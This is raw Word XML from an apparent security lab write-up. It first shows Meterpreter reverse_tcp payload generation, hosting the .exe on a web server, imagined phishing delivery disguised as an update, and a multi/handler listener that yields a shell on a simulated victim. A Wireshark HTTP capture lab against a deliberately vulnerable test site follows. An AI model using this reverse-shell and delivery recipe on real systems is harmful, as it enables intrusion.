        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E2D87">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=10.0.2.15 LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050EAED" w14:textId="77777777" w:rsidR="008E2D87" w:rsidRDefault="008E2D87"/>
    <w:p w14:paraId="58C6AF4B" w14:textId="3512BD13" w:rsidR="008E2D87" w:rsidRDefault="00981FE9">
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AEC3F6C" wp14:editId="5FB1A157">
            <wp:extent cx="5733415" cy="1626870"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="183415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58104" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="1626870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AA13F3" w14:textId="77777777" w:rsidR="00C40BAF" w:rsidRDefault="00C40BAF"/>
    <w:p w14:paraId="35C46AF3" w14:textId="71059376" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:r>
        <w:t xml:space="preserve">This file will later be downloaded and executed by our simulated victim. The file is live, weaponized, and ready. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587E7817" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9"/>
    <w:p w14:paraId="403440EB" w14:textId="50B6D5A6" w:rsidR="00981FE9" w:rsidRPr="00981FE9" w:rsidRDefault="00981FE9" w:rsidP="00981FE9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload,exe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/hello.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C27FD" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9"/>
    <w:p w14:paraId="52A551F4" w14:textId="2AF23D9C" w:rsidR="00422FAD" w:rsidRDefault="00981FE9">
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A325FD7" wp14:editId="798D7ADD">
            <wp:extent cx="5733415" cy="327025"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="206686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63105" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="327025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B47AAEC" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9"/>
    <w:p w14:paraId="6A9D9058" w14:textId="2BF479F8" w:rsidR="00981FE9" w:rsidRDefault="00981FE9" w:rsidP="00981FE9">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cd /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5BB8BB" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4549F783" w14:textId="1005BABC" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D98494" wp14:editId="3B0F4AD4">
            <wp:extent cx="5733415" cy="324485"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="15286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3336" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="324485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="585BEDD5" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B3E562" w14:textId="7B891C11" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
        <w:t>ls – find the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086689ED" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0639CFD7" w14:textId="2FBFCC88" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00981FE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C164DF4" wp14:editId="16FF3657">
            <wp:extent cx="5733415" cy="394335"/>
            <wp:effectExtent l="0" t="0" r="635" b="5715"/>
            <wp:docPr id="37491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17055" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="394335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6496BF" w14:textId="77777777" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B29CF91" w14:textId="5D6A4A8B" w:rsidR="00981FE9" w:rsidRDefault="00981FE9">
      <w:r w:rsidRPr="001E3036">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase two,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> setting up the listener. We open console </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metas</w:t>
      </w:r>
      <w:r w:rsidR="001E3036">
        <w:t>ploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E3036">
        <w:t xml:space="preserve"> command line interface and configure the multi-handler. This module will wait for incoming connections from the payload. We set the same payload type IP and port to match the file we just created. Then we execute the exploit command and the listener weight in the background. At this point we are just one execution away from remote access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347F548D" w14:textId="77777777" w:rsidR="001E3036" w:rsidRDefault="001E3036"/>
    <w:p w14:paraId="642B1710" w14:textId="4D72F4BB" w:rsidR="001E3036" w:rsidRDefault="001E3036">
      <w:r>
        <w:t xml:space="preserve">Phase three, delivering and executing the payload. Now imagine the fishing campaign from earlier succeeded. The user receives a file may be </w:t>
      </w:r>
      <w:r w:rsidR="009016A0">
        <w:t>disguised as a software update or an internal tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B3C6E5" w14:textId="77777777" w:rsidR="009016A0" w:rsidRDefault="009016A0"/>
    <w:p w14:paraId="5D9CB3F6" w14:textId="05F739DE" w:rsidR="009016A0" w:rsidRDefault="009016A0">
      <w:r w:rsidRPr="009016A0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7873BCC8" wp14:editId="3E1FAB5B">
            <wp:extent cx="5733415" cy="4653280"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="142929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93906" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="4653280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C531AC2" w14:textId="77777777" w:rsidR="009016A0" w:rsidRDefault="009016A0"/>
    <w:p w14:paraId="2DE750F5" w14:textId="5EF42F81" w:rsidR="009016A0" w:rsidRDefault="009016A0">
      <w:r>
        <w:t xml:space="preserve">Once they click on the executable, the connection is triggered. Back in our console the listener lights up. A session is established. We now have an open interpreter shell into the victim system. </w:t>
      </w:r>
      <w:r w:rsidR="00180F3E">
        <w:t xml:space="preserve">From here escalate. Inside metric, we type shell to drop into the command prompt on the victim machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503C671" w14:textId="77777777" w:rsidR="00180F3E" w:rsidRDefault="00180F3E"/>
    <w:p w14:paraId="6E6B98D5" w14:textId="7C0CA225" w:rsidR="00180F3E" w:rsidRDefault="00180F3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00427455">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0019511B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283B87FD" w14:textId="238BB287" w:rsidR="00180F3E" w:rsidRPr="0019511B" w:rsidRDefault="00180F3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019511B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DD5AFAD" w14:textId="392314A9" w:rsidR="00180F3E" w:rsidRPr="0019511B" w:rsidRDefault="00180F3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019511B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LHOST 10.0.2.15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C97440" w14:textId="48890E67" w:rsidR="00180F3E" w:rsidRPr="0019511B" w:rsidRDefault="00180F3E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0019511B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00427455" w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt; set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340068F2" w14:textId="2CE7ABCF" w:rsidR="00422FAD" w:rsidRDefault="00180F3E">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD26799" w14:textId="4A0DABBB" w:rsidR="0019511B" w:rsidRDefault="0019511B">
      <w:r w:rsidRPr="0019511B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09820C0A" wp14:editId="21195C9F">
            <wp:extent cx="5733415" cy="921385"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="170905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55807" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="921385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="415C0D3E" w14:textId="77777777" w:rsidR="0019511B" w:rsidRDefault="0019511B"/>
    <w:p w14:paraId="323DEE69" w14:textId="4B93E9C8" w:rsidR="0019511B" w:rsidRDefault="0019511B">
      <w:r>
        <w:t>We can list directories, navigate to the desktop, explore the file system all while remaining undetected by traditional antivirus software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA0E213" w14:textId="77777777" w:rsidR="009A583C" w:rsidRDefault="009A583C"/>
    <w:p w14:paraId="7862AFFF" w14:textId="5DD67451" w:rsidR="009A583C" w:rsidRDefault="009A583C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00427455">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(multi/handler) &gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> run or exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B0EF4" w14:textId="5A2FCBAE" w:rsidR="009A583C" w:rsidRDefault="009A583C"/>
    <w:p w14:paraId="55AD8D16" w14:textId="05B1C847" w:rsidR="009A583C" w:rsidRDefault="002E7746">
      <w:r w:rsidRPr="002E7746">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="105CF1C9" wp14:editId="6CE9E8B9">
            <wp:extent cx="5733415" cy="2226310"/>
            <wp:effectExtent l="0" t="0" r="635" b="2540"/>
            <wp:docPr id="69148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80903" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2226310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82F6FD" w14:textId="77777777" w:rsidR="006B196C" w:rsidRDefault="006B196C"/>
    <w:p w14:paraId="119605E6" w14:textId="77777777" w:rsidR="006B196C" w:rsidRDefault="006B196C" w:rsidP="006B196C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="495AD611" w14:textId="77777777" w:rsidR="006B196C" w:rsidRDefault="006B196C" w:rsidP="006B196C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D8914D" w14:textId="436D0B64" w:rsidR="006B196C" w:rsidRPr="006B196C" w:rsidRDefault="006B196C" w:rsidP="006B196C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>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sidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>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 xml:space="preserve">Title: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B196C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>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Network Protocol Attacks Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02454E03" w14:textId="77777777" w:rsidR="006B196C" w:rsidRDefault="006B196C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A801E86" w14:textId="51AFAFDF" w:rsidR="006B196C" w:rsidRPr="00DF4D60" w:rsidRDefault="00DF4D60">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF4D60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tool: Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440ED726" w14:textId="77777777" w:rsidR="00DF4D60" w:rsidRDefault="00DF4D60"/>
    <w:p w14:paraId="7DCF0628" w14:textId="58C4C1CE" w:rsidR="00DF4D60" w:rsidRDefault="00DF4D60">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Open Wireshark and select the network interface you want to monitor. Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF4D60">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to begin capturing packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B00A323" w14:textId="77777777" w:rsidR="00DF4D60" w:rsidRDefault="00DF4D60"/>
    <w:p w14:paraId="16F23F72" w14:textId="58646E30" w:rsidR="008E58A6" w:rsidRDefault="008E58A6">
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FE408C6" wp14:editId="01956A62">
            <wp:extent cx="5733415" cy="2815590"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="34100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00016" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2815590"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE7D49" w14:textId="77777777" w:rsidR="008E58A6" w:rsidRDefault="008E58A6"/>
    <w:p w14:paraId="3349FD57" w14:textId="77777777" w:rsidR="008E58A6" w:rsidRDefault="008E58A6" w:rsidP="00EA299B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Now I’m going to visit a website, which is a testing to test for the exchange of information between my system and the server. Let’s see if it’s trying to capture it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CA3B11" w14:textId="77777777" w:rsidR="008E58A6" w:rsidRDefault="008E58A6"/>
    <w:p w14:paraId="58C2D1DA" w14:textId="2BE3CEC7" w:rsidR="008E58A6" w:rsidRDefault="008E58A6">
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test website:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId55" w:anchor="/popular" w:history="1">
        <w:r w:rsidRPr="00F23EBE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testhtml5.vulnweb.com/#/popular</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DAE6880" w14:textId="03174742" w:rsidR="008E58A6" w:rsidRDefault="008E58A6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F1551D2" wp14:editId="3323736A">
            <wp:extent cx="5733415" cy="4091940"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:docPr id="30765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54995" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="4091940"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D5445" w14:textId="77777777" w:rsidR="008E58A6" w:rsidRDefault="008E58A6"/>
    <w:p w14:paraId="2F34350A" w14:textId="19E58AD8" w:rsidR="008E58A6" w:rsidRDefault="008E58A6" w:rsidP="00EA299B">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now to capture such packets, I have to use a filter, which is called as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> because currently when I was trying to exchange information from the site it was done on extra HTTP via port 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBBC1E3" w14:textId="77777777" w:rsidR="008E58A6" w:rsidRDefault="008E58A6"/>
    <w:p w14:paraId="6E3C7703" w14:textId="409B5880" w:rsidR="008E58A6" w:rsidRPr="008E58A6" w:rsidRDefault="008E58A6" w:rsidP="008E58A6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> == 80 || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>udp.port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> == 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F69A11" w14:textId="77777777" w:rsidR="008E58A6" w:rsidRPr="00DF4D60" w:rsidRDefault="008E58A6" w:rsidP="008E58A6"/>
    <w:p w14:paraId="3BA04C57" w14:textId="24993DB7" w:rsidR="004C1F59" w:rsidRDefault="008E58A6">
      <w:r w:rsidRPr="008E58A6">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
